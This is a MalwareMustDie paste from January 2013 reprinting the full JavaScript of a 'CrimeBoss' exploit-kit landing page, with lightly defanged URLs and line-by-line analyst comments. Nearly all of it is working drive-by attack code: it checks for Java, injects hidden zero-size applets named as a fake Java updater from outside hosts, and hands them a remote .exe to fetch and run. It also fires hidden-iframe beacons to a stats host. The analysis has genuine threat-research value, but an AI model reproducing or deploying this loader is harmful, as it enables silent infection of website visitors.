MalwareMustDie

#malwareMustDie - CrimeBoss landing Page | 2013 Jan 29

Jan 29th, 2013
  1. // MalwareMustDie
  2. // PiC: @Hulk_Crusader
  3. // Analyzed by: @unixfreaxjp
  4.  
  // Configuration globals for the landing page. "h00p" is not a valid URL
  // scheme; presumably the analyst defanged "http" before publishing, so every
  // URL below should be read as an indicator, not as a link.
  // jsm_lab_*: reporting switch plus one stats URL per stage (page access,
  // Java enabled, Java disabled, applet loaded, applet load failed). All five
  // differ only in the "action" query value on the same index.php.
  5. var jsm_lab_on = true;
  6. var jsm_lab_access = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_access';
  7. var jsm_lab_javaon = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_javaon';
  8. var jsm_lab_javaoff = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_javaoff';
  9. var jsm_lab_loaded = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_loaded';
  10. var jsm_lab_loadfail = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_loadfail';
  11.  
  // Loader state. jsm_loaded stops JSM_onCreate from initialising twice.
  // prefix + index + '.jar' gives the archive name; JSM_onLoadFail raises the
  // index while it is below jsm_applet_count, so the names run amor1.jar to
  // amor10.jar.
  12. var jsm_loaded = false;
  13. var jsm_applet_index = 1;
  14. var jsm_applet_count = 10;
  15. var jsm_applet_prefix = 'amor';
  // NOTE(review): the leading "--" is presumably further analyst neutralisation
  // of the URL; confirm against the raw capture.
  16. var jsm_applet_url = '--h00p://launafauna.com/app/';
  17.  
  // Only referenced by a commented-out line in JSM_onInit; this copy of the
  // page never loads it.
  18. var jsm_popunder_url = 'h00p://celularbom.com/js/clickpop.js';
  19.  
  // Returns the archive URL for the current retry slot:
  // jsm_applet_url + jsm_applet_prefix + jsm_applet_index + '.jar'.
  // The globals are read on every call, so the result changes once
  // JSM_onLoadFail has incremented jsm_applet_index.
  20. function JSM_getAppletURL()
  21. {
  22. return jsm_applet_url + jsm_applet_prefix + jsm_applet_index + '.jar';
  23. }
  24.  
  // Builds (but does not insert) an <iframe> pointing at src. The styling makes
  // it invisible to the visitor: visibility hidden, zero width and height, no
  // border, margin or padding. JSM_labReport2 is the caller that attaches it.
  // Analyst note: a zero-size hidden iframe created from script and aimed at a
  // third-party host is the observable artefact of each stats report here.
  25. function JSM_createIframe(src)
  26. {
  27. var iframe = document.createElement('iframe');
  28. iframe.src = src;
  29. iframe.style.visibility = 'hidden';
  30. iframe.style.display = 'inline';
  31. iframe.style.margin = '0';
  32. iframe.style.padding = '0';
  33. iframe.style.border = 'none';
  34. iframe.style.width = '0';
  35. iframe.style.height = '0';
  36. return iframe;
  37. }
  38.  
  // Builds (but does not insert) a <script> element that would load src.
  // The only call site in this listing is the commented-out pop-under line in
  // JSM_onInit, so the helper is unused in this copy.
  39. function JSM_createScript(src)
  40. {
  41. var script = document.createElement('script');
  42. script.type = 'text/javascript';
  43. script.src = src;
  44. return script;
  45. }
  46.  
  // Returns a request object, or null when none can be created.
  // NOTE(review): "XMLh00pRequest" and "Microsoft.XMLh00p" are not browser
  // APIs; presumably the analyst's blanket replacement of "http" also rewrote
  // the original XMLHttpRequest names. As published, window.XMLh00pRequest is
  // undefined, so control reaches the ActiveXObject branch, and any exception
  // raised there is caught and turned into null.
  47. function getXMLh00pRequest()
  48. {
  49. if (window.XMLh00pRequest) return new window.XMLh00pRequest;
  50. else
  51. {
  52. try
  53. {
  54. return new ActiveXObject("Microsoft.XMLh00p");
  55. }
  56. catch(ex)
  57. {
  58. return null;
  59. }
  60. }
  61. }
  62.  
  // Sends an asynchronous GET to url and ignores the response: the
  // readystatechange handler contains nothing but a commented-out alert.
  // Does nothing when no request object is available.
  // Every call to this function in the listing is commented out in favour of
  // JSM_labReport2, so this path is dead code in this copy.
  63. function JSM_labReport(url)
  64. {
  65. var oReq = getXMLh00pRequest();
  66. if (oReq)
  67. {
  68. oReq.onreadystatechange = function ()
  69. {
  70. if (oReq.readyState == 4)
  71. {
  72. if (oReq.status == 200)
  73. {
  74. //window.alert('from callback ' + oReq.responseText);
  75. }
  76. }
  77. };
  78.  
  79. oReq.open("GET", url, true);
  80. oReq.send();
  81. }
  82. }
  83.  
  // The reporting path the page actually uses: inserts a hidden iframe (see
  // JSM_createIframe) pointing at url as the first child of document.body.
  // Silently does nothing if document.body does not exist yet.
  // Analyst note: each stage therefore shows up as a separate frame request to
  // the stats host, which makes the sequence visible in proxy or browser logs.
  84. function JSM_labReport2(url)
  85. {
  86. var hhBody = document.body;
  87. if (hhBody)
  88. {
  89. hhBody.insertBefore(JSM_createIframe(url), hhBody.firstChild);
  90. }
  91. }
  92.  
  // Builds (but does not insert) an <img> element with the given src.
  // No caller appears anywhere in this listing.
  93. function JSM_createImg(src)
  94. {
  95. var img = document.createElement('img');
  96. img.src = src;
  97. return img;
  98. }
  99.  
  // Wraps an HTML string in a detached <span> by assigning it to innerHTML.
  // In this listing the callers (JSM_onInit, JSM_onLoadFail) pass the applet
  // markup built by the JSM_getAppletHtml* functions, so inserting the span
  // into the document is what instantiates the applets.
  100. function JSM_createSpan(html)
  101. {
  102. var span = document.createElement('span');
  103. span.innerHTML = html;
  104. return span;
  105. }
  106.  
  // Returns the <applet> markup for the current amorN.jar archive (see
  // JSM_getAppletURL). Traits visible in the string: the applet name imitates
  // a Java updater, the class is amor.class, the element is 0x0 with
  // visibility hidden, and mayscript="true" is set on this variant only.
  // NOTE(review): the "link" param carries an .exe URL followed by ";exe;0";
  // presumably the applet reads it to locate its payload. The applet code is
  // not part of this listing, so confirm against the jar.
  107. function JSM_getAppletHtml()
  108. {
  109. return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + JSM_getAppletURL() + '" width="0" height="0" style="visibility: hidden" mayscript="true"> <param name="link" value="h00p://patuamusic.com.br/app/rh.exe;exe;0"> </param></applet>';
  110. }
  111.  
  // Same hidden 0x0 applet markup as JSM_getAppletHtml, but the archive is
  // java7.jar under jsm_applet_url and no mayscript attribute is set.
  // The "r" query value is a random integer between 100001 and 1099999,
  // presumably there to defeat caching; every page load requests a different
  // URL, so match on the path rather than the full query string.
  112. function JSM_getAppletHtml_Y()
  113. {
  114. return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + jsm_applet_url + 'java7.jar?r=' + Math.floor(100000 + (Math.random()*999999 + 1)) + '" width="0" height="0" style="visibility: hidden"> <param name="link" value="h00p://patuamusic.com.br/app/rh.exe;exe;0"> </param> </applet>';
  115. }
  116.  
  // Same hidden 0x0 applet markup as JSM_getAppletHtml_Y, with jmx.jar as the
  // archive. The "r" query value is again a random integer between 100001 and
  // 1099999, and the "link" param is identical to the other two variants.
  117. function JSM_getAppletHtml_X()
  118. {
  119. return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + jsm_applet_url + 'jmx.jar?r=' + Math.floor(100000 + (Math.random()*999999 + 1)) + '" width="0" height="0" style="visibility: hidden"> <param name="link" value="h00p://patuamusic.com.br/app/rh.exe;exe;0"> </param> </applet>';
  120. }
  121.  
  // Reports the "loaded" stage with no variant tag, when reporting is on.
  // NOTE(review): nothing in this script calls JSM_onLoadA; presumably the
  // amorN.jar applet (the only one with mayscript="true") calls back into the
  // page. Confirm against the jar.
  122. //Normal
  123. function JSM_onLoadA()
  124. {
  125. //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
  126. if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded);
  127. }
  128.  
  129.  
  // Reports the "loaded" stage with '&k=j' appended, when reporting is on.
  // The author's label ties this callback to the jmx.jar variant.
  // NOTE(review): no call site exists in this script; the caller is presumably
  // applet-side. Confirm against the jar.
  130. //Java JMX
  131. function JSM_onLoadB()
  132. {
  133. //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
  134. if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded + '&k=j');
  135. }
  136.  
  137.  
  // Reports the "loaded" stage with '&k=c' appended, when reporting is on.
  // The author's label ties this callback to the java7.jar variant.
  // NOTE(review): no call site exists in this script; the caller is presumably
  // applet-side. Confirm against the jar.
  138. //Java 7
  139. function JSM_onLoadC()
  140. {
  141. //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
  142. if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded+ '&k=c');
  143. }
  144.  
  // Failure callback: reports the "loadfail" stage, then retries with the next
  // numbered archive. While jsm_applet_index is below jsm_applet_count it is
  // incremented and a fresh amorN.jar applet is injected at the top of <body>.
  // NOTE(review): alert(123) raises a visible dialog on every failure; it looks
  // like leftover debugging, and it is a user-visible symptom worth asking
  // about during triage.
  // NOTE(review): no call site exists in this script; the caller is presumably
  // applet-side. Confirm against the jar.
  145. function JSM_onLoadFail()
  146. {
  147. //if (jsm_lab_on) JSM_labReport(jsm_lab_loadfail);
  148. if (jsm_lab_on) JSM_labReport2(jsm_lab_loadfail);
  149. alert(123);
  150. if (jsm_applet_index < jsm_applet_count)
  151. {
  152. jsm_applet_index++;
  153.  
  154. var hBody = document.body;
  155. if (hBody)
  156. {
  157. var html = JSM_getAppletHtml();
  158. hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);
  159. }
  160. }
  161. }
  162.  
  // Main routine, run once the page has a <body> (hBody is that element).
  //  1. Reports the "access" stage.
  //  2. If navigator.javaEnabled() is true: concatenates the java7.jar,
  //     jmx.jar and amorN.jar applet markup, reports "javaon", and injects all
  //     three applets at the top of <body> in a single span.
  //  3. Otherwise reports "javaoff" and injects nothing.
  // Analyst note: per this code, a browser with the Java plug-in disabled
  // receives only the two stats beacons and no applet markup.
  163. function JSM_onInit(hBody)
  164. {
  165.  
  166. //if (jsm_lab_on) JSM_labReport(jsm_lab_access);
  167. if (jsm_lab_on) JSM_labReport2(jsm_lab_access);
  168.  
  169. if (hBody)
  170. {
  171. var html = '';
  172.  
  173. if (navigator.javaEnabled())
  174. {
  175. //java on
  176.  
  177. html = JSM_getAppletHtml_Y() + JSM_getAppletHtml_X() + JSM_getAppletHtml();
  178.  
  179. //if (jsm_lab_on) JSM_labReport(jsm_lab_javaon);
  180. if (jsm_lab_on) JSM_labReport2(jsm_lab_javaon);
  181.  
  182. hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);
  183. }
  184. else
  185. {
  186. //report java disabled access
  187. if (jsm_lab_on) JSM_labReport2(jsm_lab_javaoff);
  188. }
  189.  
  190. //hBody.insertBefore(JSM_createScript(jsm_popunder_url), hBody.firstChild);
  191. }
  192. }
  193.  
  // Run-once entry point. Returns immediately if jsm_loaded is already set.
  // When document.body exists it sets the flag and calls JSM_onInit; otherwise
  // it re-schedules itself every 100 ms until the body appears.
  // The timer is given a string, which the browser evaluates as code.
  194. function JSM_onCreate()
  195. {
  196. if (jsm_loaded) return;
  197.  
  198. var myBody = document.body;
  199. if (myBody)
  200. {
  201. jsm_loaded = true;
  202. JSM_onInit(myBody);
  203. }
  204. else
  205. {
  206. setTimeout("JSM_onCreate()", 100);
  207. }
  208. }
  209.  
  // Chains f onto window.onload: any handler already installed is kept and
  // runs first, then f. An injected copy of this script therefore leaves the
  // host page's own onload behaviour intact.
  210. function WindowOnload(f)
  211. {
  212. var prev = window.onload;
  213. window.onload = function() { if (prev) prev(); f(); }
  214. }
  215.  
  // Two triggers for the same entry point: the window load event, and a
  // 7-second timer that fires whether or not that event has occurred.
  // jsm_loaded makes whichever runs second a no-op.
  216. WindowOnload(JSM_onCreate);
  217. setTimeout("JSM_onCreate()", 7000);